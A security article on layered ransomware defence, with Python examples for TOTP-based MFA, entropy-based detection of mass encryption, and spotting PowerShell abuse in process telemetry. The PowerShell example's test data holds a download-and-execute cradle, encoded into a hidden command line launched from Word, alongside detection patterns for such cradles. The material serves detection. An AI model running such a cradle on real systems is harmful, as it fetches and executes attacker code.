How to Bridge the Ransomware Security Gap

It is hard to believe how far ransomware has come since its inception in the late 1980s. Today’s big-game ransomware attacks, which threaten everything from critical infrastructure and large corporations to hospitals and schools, can be traced back to a trojan mailed on floppy disks to AIDS researchers in 1989 that locked up their computers and demanded payment. Since then, attacks and targets have grown in size and sophistication.

According to recent reports, ransomware attacks increased by 80% in the first half of 2022 compared to the first half of 2021. Today’s attackers break into a network, spend time enumerating the environment and studying the victim, stage the ransomware on as many devices as possible, and then trigger it so that encryption runs everywhere simultaneously. The effects can be devastating and costly, as the Colonial Pipeline incident showed.

Threat actors have also moved beyond traditional single-extortion attacks to double and triple extortion. In a double-extortion attack, the attackers not only encrypt data but also steal it and threaten to leak it unless a ransom is paid. In a triple-extortion attack they go further, pressuring the victim’s partners and customers with the stolen data or launching a DDoS against the victim’s services.

Many midsize organizations struggle to understand the layers of security required to build an effective defense. Although email is still a common threat vector, the routes a ransomware attack can take vary greatly. To address these challenges, let’s examine the elements required to close the ransomware security gap that many organizations face.

The first is easy to state: patching. Keeping enterprise software up to date, especially on publicly accessible resources such as web applications and web servers, is vital. In most cases attackers exploit known vulnerabilities for which a fix already exists; ransomware operators rarely need a true zero-day. But for IT admins running a hybrid environment with strict availability requirements, patching can present a serious challenge.


Next, implement strong password practices. There is an old adage in cybersecurity: “Hackers don’t break in; they log in.” Most often an attacker uses stolen credentials obtained through a phishing email or bought on the dark web. These let the attacker gain an initial foothold in the organization and then escalate privileges. Strong passwords are long and random (32 characters is a reasonable target). Password managers make users’ lives easier by generating and storing complex, unique passwords, reducing what the user has to remember to a single master password.

However, relying on passwords alone is weak protection. This is where multi-factor authentication (MFA) comes into play. MFA is a much stronger way to validate a user’s identity. A password is just one factor (something you know); a biometric (something you are), a hardware token or a certificate (something you have) can each serve as another. Anyone attempting to access the corporate network must present at least two independent factors, so compromising any single factor is not enough to gain access. One caveat: one-time codes sent by SMS or generated by an authenticator app can still be relayed by a real-time phishing proxy, whereas phishing-resistant methods such as FIDO2/WebAuthn security keys bind the login to the legitimate site.
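The password and MFA advice above, as a worked server-side check. This is an added example, not code from the original article: the login requires a salted PBKDF2 password hash to match and a fresh RFC 6238 TOTP code from the user’s authenticator app, so a password captured by phishing is useless on its own and a captured code cannot be replayed. The user record, the password and the TOTP secret are constructed demo values (the secret is the RFC 6238 reference secret); a real deployment would use a proper user store and an enrolment flow that shows the secret as a QR code once.

```python
"""Two-factor login check: a password (something you know) plus a TOTP code
from an authenticator app (something you have), so that a stolen password on
its own is not enough. Added example, not code from the original article.
The user record, password and TOTP secret below are constructed demo values."""
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 600_000  # OWASP-recommended order of magnitude for PBKDF2-SHA256


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password (HMAC-SHA1, dynamic truncation)."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based OTP: HOTP over the number of 30-second steps elapsed."""
    return hotp(secret, unix_time // step, digits)


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


USERS = {}  # username -> record; an in-memory stand-in for a real user store


def enrol(username: str, password: str, totp_secret: bytes) -> None:
    """Store a salted password hash and the shared TOTP secret (shown to the
    user once, normally as a base32 QR code, at enrolment)."""
    salt = secrets.token_bytes(16)
    USERS[username] = {"salt": salt, "hash": hash_password(password, salt),
                       "totp_secret": totp_secret, "last_counter": -1}


def verify_login(username: str, password: str, code: str, now: int,
                 step: int = 30) -> bool:
    """Both factors must pass. Returns True only on a fresh, valid pair."""
    user = USERS.get(username)
    if user is None:
        hash_password(password, b"\x00" * 16)  # keep timing similar for unknown users
        return False
    password_ok = hmac.compare_digest(hash_password(password, user["salt"]), user["hash"])

    # Accept the current time step and one either side to tolerate clock skew,
    # but never a step at or below the last one used: a captured code cannot
    # be replayed, even within its 30-second validity.
    counter = now // step
    matched = None
    for c in (counter - 1, counter, counter + 1):
        if c > user["last_counter"] and hmac.compare_digest(hotp(user["totp_secret"], c), code):
            matched = c
            break

    if password_ok and matched is not None:
        user["last_counter"] = matched
        return True
    return False


if __name__ == "__main__":
    secret = b"12345678901234567890"  # RFC 6238 reference secret, used as a demo value
    enrol("alice", "correct horse battery staple", secret)
    now = 1_700_000_000
    code = totp(secret, now)
    print("password only:      ", verify_login("alice", "correct horse battery staple", "000000", now))
    print("code only:          ", verify_login("alice", "guessed-password", code, now))
    print("password + code:    ", verify_login("alice", "correct horse battery staple", code, now))
    print("same code replayed: ", verify_login("alice", "correct horse battery staple", code, now))
```

Both factors are always evaluated before the decision so that the response time does not reveal which one failed, and the last accepted time step is recorded so the same six digits cannot be presented twice.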

Backups are also crucial for protection against ransomware. When a company can recover encrypted files from a backup, it removes the leverage of a single-extortion attack (although not of data theft). Backups are also a best practice for disaster recovery. But there are nuances to using backups as part of a ransomware mitigation strategy. Attackers often seek out backup services and disable or encrypt them before detonating the ransomware. Companies should therefore follow the 3-2-1 rule: three copies of the data, on two different types of media, with one copy kept offline or off-site. An offline or immutable copy of critical data is out of reach of an attacker who already controls the production network.

Advanced malware prevention is also essential for strong ransomware defenses. For the past few decades, malware detection and prevention has been based mostly on signatures: patterns drawn from specific files. This approach is reactive. When an attacker releases a new piece of malware, say ransomware, the antivirus vendor analyzes it, confirms that it is malicious, and extracts a unique pattern, whether a hash of the file or something else; a rule is then created to match and identify that file in future. But today’s malware is evasive and polymorphic (WannaCry, for example, exists in thousands of variants), and a single changed byte defeats a hash-based signature. In fact, according to recent research, nearly 80% of malware evades signature-based detection. Advanced malware detection uses machine learning and behavioral analysis to stop zero-day malware, which is often used to gain access to a system and then drop the ransomware.
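The contrast between the two approaches, as an added example that is not part of the original article. The signature check is a hash blocklist; the behavioral check ignores which binary is running and instead flags a process that rewrites many files in a short window with high-entropy (ciphertext-like) content. The fake binary, the blocklist and the file-write events are all constructed for the demonstration, and the thresholds (20 files in 10 seconds, 80% of writes above 7 bits per byte) are assumptions to be tuned, not values from the page.

```python
"""Signature matching versus behavioural detection of ransomware activity.
Added example, not code from the original article. The 'binary', the hash
blocklist and the file-write events below are all constructed for illustration."""
import hashlib
import math
import random
from collections import defaultdict

# ---- Signature-based: is this exact file already known to be bad? ----------
KNOWN_BAD_SHA256 = set()


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def signature_match(sample: bytes) -> bool:
    return sha256(sample) in KNOWN_BAD_SHA256


# ---- Behaviour-based: what is the process doing to the file system? --------
def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Plain documents sit around 4-5; ciphertext approaches 8."""
    if not data:
        return 0.0
    counts = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def behavioural_alert(events, window=10.0, min_files=20, min_entropy=7.0, ratio=0.8):
    """events: iterable of (timestamp, pid, path, bytes_written).

    Flags a process that rewrites at least `min_files` distinct files within
    `window` seconds where at least `ratio` of those writes are high-entropy,
    i.e. the mass-encryption pattern, regardless of which binary is doing it.
    Returns {pid: distinct files touched in the worst window}.
    """
    by_pid = defaultdict(list)
    for ts, pid, path, data in sorted(events, key=lambda e: (e[1], e[0])):
        by_pid[pid].append((ts, path, data))
    alerts = {}
    for pid, evs in by_pid.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1          # slide the window forward
            span = evs[start:end + 1]
            files = {p for _, p, _ in span}
            if len(files) < min_files:
                continue
            high = sum(1 for _, _, d in span if shannon_entropy(d) >= min_entropy)
            if high / len(span) >= ratio:
                alerts[pid] = max(alerts.get(pid, 0), len(files))
    return alerts


# ---- Constructed sample data ----------------------------------------------
_rng = random.Random(1)  # fixed seed so the demo is reproducible
SAMPLE_BINARY = b"MZ" + b"\x90" * 64 + b"fake-locker-v1"   # stands in for a known sample
KNOWN_BAD_SHA256.add(sha256(SAMPLE_BINARY))
MUTATED_BINARY = SAMPLE_BINARY + b"\x00"                 # one appended byte: new hash

# A process mass-rewriting documents with random (ciphertext-like) content...
RANSOMWARE_EVENTS = [
    (100.0 + i * 0.1, 4242, f"C:\\Users\\bob\\Documents\\report_{i}.docx.locked",
     bytes(_rng.getrandbits(8) for _ in range(1024)))
    for i in range(30)
]
# ...versus a word processor saving a few plain-text files over the same period.
BENIGN_EVENTS = [
    (100.0 + i * 1.0, 1000, f"C:\\Users\\bob\\Documents\\notes_{i}.txt",
     (b"Quarterly planning notes, draft %d. " % i) * 40)
    for i in range(5)
]

if __name__ == "__main__":
    print("signature hit on original:", signature_match(SAMPLE_BINARY))
    print("signature hit after 1-byte change:", signature_match(MUTATED_BINARY))
    print("behavioural alerts:", behavioural_alert(RANSOMWARE_EVENTS + BENIGN_EVENTS))
```

The behavioral rule is the one that survives the recompiled variant, but it has its own failure mode: archivers, disk encryption and backup agents also write many high-entropy files quickly, so in practice the rule is paired with a per-process baseline or an allow list rather than run blind.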


Another useful layer is endpoint detection and response (EDR). “Living off the land” techniques abuse legitimate parts of the operating system (such as Windows PowerShell) to give attackers access and to run malicious code inside a legitimate process without ever writing a malware file to disk. To catch this type of attack you need to monitor memory and running processes and look for things like DLL or process injection, suspicious parent-child process relationships and encoded command lines. EDR solutions examine post-execution activity and anomalies to identify and remediate attacks.
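One concrete piece of that post-execution telemetry analysis, as an added example that is not from the original article or any EDR product: process-creation events are checked for PowerShell launched by an Office application, a hidden window, and an -EncodedCommand argument, which is decoded (base64 of UTF-16LE) so that a download-and-execute cradle hidden inside it can be matched. The event lines are constructed to resemble Sysmon Event ID 1 fields in a simple tab-separated key=value layout of my own; they are not real captures, and the IP address is documentation address space.

```python
"""Spotting living-off-the-land PowerShell abuse in process-creation telemetry.
Added example, not code from the original article. The events below are
constructed to resemble Sysmon Event ID 1 fields; they are not real captures."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the argument is
# base64 of the script in UTF-16LE, which is why a plain grep of the command
# line misses the payload.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-(?:w|win|window|windowstyle)\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"\biex\b|invoke-expression|frombase64string", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    """Tab-separated key=value fields (constructed format for this example)."""
    return dict(field.split("=", 1) for field in line.split("\t"))


def analyse(event: dict) -> list:
    """Return the list of suspicious traits found in one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    findings = []
    if image not in POWERSHELL:
        return findings
    if parent in OFFICE_PARENTS:
        findings.append(f"powershell spawned by office app {parent}")
    if HIDDEN_WINDOW.search(cmd):
        findings.append("hidden window")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded command")
    # Inspect the *decoded* script when there is one; that is where the cradle lives.
    if DOWNLOAD_CRADLE.search(decoded if decoded is not None else cmd):
        findings.append("download/execute cradle")
    return findings


# Constructed sample: a macro-spawned, hidden, encoded download cradle
# (198.51.100.7 is documentation address space), an admin's scheduled
# script, and an unrelated cmd.exe launch.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tCommandLine=powershell.exe -nop -w hidden -enc " + ENCODED,
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Windows\\System32\\svchost.exe"
    "\tCommandLine=powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1",
    "Image=C:\\Windows\\System32\\cmd.exe"
    "\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=cmd.exe /c dir",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        event = parse_event(line)
        print(event["CommandLine"][:60], "->", analyse(event) or "clean")
```

Each trait on its own is weak evidence (administrators run encoded commands too); the value is in the combination, and in decoding the argument rather than matching on the raw command line, which is the point the EDR vendors make when they talk about post-execution visibility.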

Finally, organizations must not overlook the value of end-user education, because even the most robust security strategy is only as strong as its weakest link. Phishing and spear phishing are common vectors for ransomware, so organizations need to ensure every user knows the basics of email security and understands how spear phishing works.

The risks posed by ransomware are just one part of an increasingly complex cybersecurity landscape. While no single control can stop ransomware, a multi-layered defense (network perimeter, identity and MFA, backups and endpoint controls) can ultimately make organizations more secure.

Copyright © 2022 IDG Communications, Inc.
